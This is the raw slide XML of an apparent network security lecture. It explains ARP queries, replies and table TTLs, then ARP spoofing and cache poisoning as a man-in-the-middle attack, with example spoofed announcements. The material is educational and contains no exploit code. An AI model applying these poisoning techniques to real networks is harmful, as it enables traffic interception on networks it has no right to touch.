              <a:chOff x="-44" y="1473"/>
              <a:chExt cx="981" cy="1105"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="77" name="Picture 42" descr="desktop_computer_stylized_medium">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87EA0D93-21F4-2F41-BC21-3244E9F9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id="{AC4ED98E-24ED-7845-948B-F37EC77BBA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73" name="Text Box 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD56C76B-D256-BA45-B5C6-9C69CF312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9858" y="3246090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>
                  <a:latin typeface="+mn-lt"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>137.196.7.78</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="74" name="Text Box 36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FE2DD02-437B-BD40-B8BC-D8F1E3FD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6009" y="5130248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>
                  <a:latin typeface="+mn-lt"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>137.196.7.14</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="75" name="Text Box 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC007CEB-B2AD-9C40-859B-963764C16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276" y="5947742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>
                  <a:latin typeface="+mn-lt"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>137.196.7.88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id="{BAA1C6E0-33E8-604C-BF4C-E7F8EED04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753" y="5170004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>
                  <a:latin typeface="+mn-lt"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>137.196.7.23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46546A-4C05-6448-B20D-C122FF754D91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1539749" y="2737791"/>
            <a:ext cx="3653512" cy="2923999"/>
            <a:chOff x="1446381" y="2663687"/>
            <a:chExt cx="3653512" cy="2923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BA5E9CA-3EEB-3D4C-94D2-116047F3B04D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2754559" y="2663687"/>
              <a:ext cx="479618" cy="437323"/>
              <a:chOff x="2317237" y="2601212"/>
              <a:chExt cx="479618" cy="437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3F027A-1BC4-FF42-ABAF-326F9EBCDE7B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CF5883-3135-F546-978F-2F1DF5A5FEDF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ARP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9241A8B-79A4-9A44-84FC-DDD5D1C7E66D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2463958" y="5150363"/>
              <a:ext cx="479618" cy="437323"/>
              <a:chOff x="2317237" y="2601212"/>
              <a:chExt cx="479618" cy="43732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A52BDC-E20B-CD42-92BD-D934D34CDE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04BA43-DD92-2D48-A37B-B5AB88E8275D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ARP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0B40655-D207-4B43-BDBC-5A8A359EB4BE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1446381" y="3530757"/>
              <a:ext cx="479618" cy="437323"/>
              <a:chOff x="2317237" y="2601212"/>
              <a:chExt cx="479618" cy="43732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09CB092-EC49-C748-9C60-C6C7BE5D23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310B648-0A48-B341-982E-67DBE3BC8F8C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ARP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91EF928-0B96-E94A-9865-02E6EC100722}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4620275" y="3785389"/>
              <a:ext cx="479618" cy="437323"/>
              <a:chOff x="2317237" y="2601212"/>
              <a:chExt cx="479618" cy="43732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271BF07-D4F0-984E-AF46-10383E6D9CCD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023F87F-F1C6-B24D-8EDA-F5FC3A9ACD24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ARP</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A83C14A-4461-9346-A5E9-676E90D4631D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5785443" y="3298343"/>
            <a:ext cx="5472170" cy="290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sz="2800"/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2000"/>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="0000A8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt; IP address; MAC address; TTL&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>TTL (Time To Live): time after which address mapping will be forgotten (typically 20 min)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21992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>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>ARP protocol in action</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" b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ARP table in </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US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IP </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" err="1"/>
                  <a:t>addr</a:t>
                </a:r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MAC </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" err="1"/>
                  <a:t>addr</a:t>
                </a:r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88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/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>s MAC address not in A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>s ARP table, so A uses ARP to find B’s MAC address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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689113" y="2175367"/>
            <a:ext cx="5579166" cy="1015663"/>
            <a:chOff x="689113" y="2070437"/>
            <a:chExt cx="5579166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993914" y="2070437"/>
              <a:ext cx="52743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>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="0000A8"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000"/>
                <a:t> broadcasts ARP query, containing B's IP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" err="1"/>
                <a:t>addr</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2000"/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/>
                <a:t>destination MAC address = FF-FF-FF-FF-FF-FF</a:t>
              </a:r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/>
                <a:t>all nodes on LAN receive ARP query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1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cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Source MAC:  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>71-65-F7-2B-08-53</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Source IP: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600"/>
                <a:t>137.196.7.23</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1600"/>
                <a:t>Target IP address: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400"/>
                <a:t>137.196.7.14</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:latin typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>…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2BD21F-B726-4F40-9D4F-27BF9ABCB338}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5367131" y="3596877"/>
            <a:ext cx="2849218" cy="2007707"/>
            <a:chOff x="437322" y="4803913"/>
            <a:chExt cx="2849218" cy="2007707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F6B69C75-3517-234C-9022-322822C8ECE4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="1335154" y="6172202"/>
              <a:ext cx="1073429" cy="20540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id="{E2103C84-F9BB-754A-8DB4-9EED1407A0E5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="1408044" y="5105399"/>
              <a:ext cx="775252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>
              <a:off x="437322" y="5499652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255" y="5177985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DD04DE-490A-BF4D-A7E2-3A174C7DB200}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5817705" y="4121995"/>
            <a:ext cx="410817" cy="461665"/>
            <a:chOff x="2292626" y="5618921"/>
            <a:chExt cx="410817" cy="461665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89879-A092-1D48-94AB-CCE5CC88B4FF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2292626" y="5645426"/>
              <a:ext cx="410817" cy="41081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F7794D-4F3F-5742-9DD7-7030CC3F326A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2319130" y="56189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1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623617" y="2453566"/>
            <a:ext cx="3985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cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Ethernet frame (sent to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>FF-FF-FF-FF-FF-FF)</a:t>
            </a:r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06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>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>ARP protocol in action</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" b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ARP table in </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US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IP </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" err="1"/>
                  <a:t>addr</a:t>
                </a:r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MAC </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" err="1"/>
                  <a:t>addr</a:t>
                </a:r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9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/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>s MAC address not in A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>s ARP table, so A uses ARP to find B’s MAC address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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7730987" y="5422150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>
                  <a:solidFill>
                    <a:srgbClr val="0000A8"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>B</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000"/>
                <a:t> replies to A with ARP response, giving its MAC address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Target IP address: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400"/>
                <a:t>137.196.7.14</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1600"/>
                <a:t>Target MAC address: </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>                    58-23-D7-FA-20-B0</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:latin typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>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2849218" cy="741718"/>
            <a:chOff x="5367131" y="3866019"/>
            <a:chExt cx="2849218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6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9DD04DE-490A-BF4D-A7E2-3A174C7DB200}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7434470" y="4043570"/>
              <a:ext cx="410817" cy="461665"/>
              <a:chOff x="2292626" y="5618921"/>
              <a:chExt cx="410817" cy="46166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6289879-A092-1D48-94AB-CCE5CC88B4FF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F7794D-4F3F-5742-9DD7-7030CC3F326A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2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901911" y="2228279"/>
            <a:ext cx="295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cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ARP message into Ethernet frame (sent to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>71-65-F7-2B-08-53</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>)</a:t>
            </a:r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>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>ARP protocol in action</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" b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ARP table in </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US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IP </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" err="1"/>
                  <a:t>addr</a:t>
                </a:r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MAC </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" err="1"/>
                  <a:t>addr</a:t>
                </a:r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94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/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>s MAC address not in A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>s ARP table, so A uses ARP to find B’s MAC address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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1144656" y="5342636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>
                  <a:solidFill>
                    <a:srgbClr val="0000A8"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000"/>
                <a:t> receives B’s reply, adds B entry into its local ARP table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1637539" cy="741718"/>
            <a:chOff x="5367131" y="3866019"/>
            <a:chExt cx="1637539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F39055-4138-5345-8C30-F70330025618}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1217886" y="3923211"/>
            <a:ext cx="3224987" cy="523220"/>
            <a:chOff x="1217886" y="3818281"/>
            <a:chExt cx="3224987" cy="523220"/>
          </a:xfrm>
        </p:grpSpPr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1DADF13F-2D2F-5443-842A-4A233EADB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7886" y="3818281"/>
              <a:ext cx="8803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>
                  <a:latin typeface="Arial" charset="0"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>137.196.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" i="0">
                  <a:latin typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>       </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" i="0">
                  <a:latin typeface="Arial" charset="0"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>7.14</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="77" name="Text Box 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82505451-0901-AA46-96C0-FED04AAB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7388" y="3897795"/>
              <a:ext cx="17399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>
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>58-23-D7-FA-20-B0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="78" name="Text Box 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED5A362E-E35A-6241-9A98-218C81894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049" y="3891169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>
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>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184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3B7-37B0-18B5-1DAC-2D84A16B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MITRE Attack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67E4D-7141-599D-6353-59FFB64C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78" y="1845426"/>
            <a:ext cx="8436591" cy="44503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BB148-89E4-8EA1-089E-E2A2B9BB3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Security: 8- </a:t>
            </a:r>
            <a:fld id="{C4204591-24BD-A542-B9D5-F8D8A88D2FE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5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183B-B83F-AEBB-05D0-F0585433C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ARP Spoofing – Some Remarks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FC95C-141D-1FB8-F508-E2F198717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F2EBA-61C9-FC77-8415-ABD25A27F943}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1759789"/>
            <a:ext cx="1112461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/>
              <a:t>The ARP table is updated whenever an ARP response is received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/>
              <a:t>Requests are not tracked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/>
              <a:t>ARP announcements are not authenticated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/>
              <a:t>Machines trust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/>
              <a:t>A rogue machine can spoof other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/>
              <a:t>ARP table is updated whenever an ARP response is received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/>
              <a:t>Requests are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="1"/>
              <a:t>not tracked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/>
              <a:t>ARP announcements are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="1"/>
              <a:t>not authenticated</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16046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4B5C-C30B-FA67-3328-721C8070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Poisoned ARP Caches (MITM attack)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EB9712-190B-737F-6A7D-6FFF8B5DF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4" name="modem">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70CBD302-7990-4B6B-AF5A-8256393C55C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845719" y="5161579"/>
            <a:ext cx="850900" cy="406400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 21600"/>
              <a:gd name="T1" fmla="*/ 645618423 h 21600"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 21600"/>
              <a:gd name="T3" fmla="*/ 0 h 21600"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 21600"/>
              <a:gd name="T5" fmla="*/ 0 h 21600"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 21600"/>
              <a:gd name="T7" fmla="*/ 645618423 h 21600"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 21600"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 21600"/>
              <a:gd name="T10" fmla="*/ 0 w 21600"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 21600"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 21600"/>
              <a:gd name="T13" fmla="*/ 0 h 21600"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 21600"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 21600"/>
              <a:gd name="T16" fmla="*/ 0 w 21600"/>
              <a:gd name="T17" fmla="*/ 1676201090 h 21600"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 21600"/>
              <a:gd name="T19" fmla="*/ 1676201090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endParaRPr lang="en-US" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CA58ECE-02A4-C371-DBD2-F060DEA65AB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847806" y="4898054"/>
            <a:ext cx="914400" cy="787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2147483647 h 21600"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 21600"/>
              <a:gd name="T9" fmla="*/ 0 h 21600"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 21600"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 21600"/>
              <a:gd name="T12" fmla="*/ 0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4445 w 21600"/>
              <a:gd name="T25" fmla="*/ 1858 h 21600"/>
              <a:gd name="T26" fmla="*/ 17311 w 21600"/>
              <a:gd name="T27" fmla="*/ 12323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endParaRPr lang="en-US" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71AA3945-D010-AE4E-5518-041EC3B2982B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833269" y="2231054"/>
            <a:ext cx="914400" cy="7874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DED3B-B95F-4B5E-19D7-B6FB2D32F4CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4394995" y="3937616"/>
            <a:ext cx="1819274" cy="5032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192.168.1.105 is at 00:11:22:33:44:03</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="table">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEFBF470-D41E-0D63-C15F-287C084B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156" y="5796579"/>
            <a:ext cx="3111500" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="table">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{366E632B-84B9-8398-70A4-535D2784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656" y="5796579"/>
            <a:ext cx="3311525" cy="60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6ED4CA-478D-9707-EC91-165CAF8A7907}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4082256" y="2916854"/>
            <a:ext cx="6858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DE49FC-E50E-99FF-E71F-D3465DD6344C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="11" idx="0"/>
            <a:endCxn id="6" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4988719" y="1929429"/>
            <a:ext cx="423862" cy="1550988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1D890E-5F99-7F08-CF48-EBCB4F54701A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4271169" y="3297854"/>
            <a:ext cx="153987" cy="1863725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204053D-9468-EAC3-1F5C-FA60F1ED2A6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7739856" y="2916854"/>
            <a:ext cx="6858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9E171E-B45D-BC2B-D0A5-AD891383041D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="3"/>
            <a:endCxn id="14" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6609556" y="2492992"/>
            <a:ext cx="1473200" cy="423862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D4B0F9-0AC4-35F5-CCD4-7C2DBF21C38D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="14" idx="2"/>
            <a:endCxn id="5" idx="4"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="7393781" y="3986829"/>
            <a:ext cx="1600200" cy="222250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1EB79-95A2-84A1-6170-A1D9494734BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="6" idx="5"/>
            <a:endCxn id="8" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5304632" y="3018454"/>
            <a:ext cx="985837" cy="91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4021A3C-3BAE-9CB3-82EB-82EFC3E39D07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6366669" y="3983654"/>
            <a:ext cx="1752600" cy="457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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.1.1 is at 00:11:22:33:44:03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953BA4-E746-3914-5CA0-FDBE11E96125}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="5"/>
            <a:endCxn id="18" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6290469" y="3018454"/>
            <a:ext cx="952500" cy="965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1C53EE-EBD2-F3BD-8C6C-37212E98AB2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="18" idx="2"/>
            <a:endCxn id="5" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="7257256" y="4426567"/>
            <a:ext cx="719138" cy="7477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21" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E21FBCA-6CD6-D86D-26EE-6360DBCBF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58" y="4364654"/>
            <a:ext cx="240963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</a:rPr>
              <a:t>192.168.1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
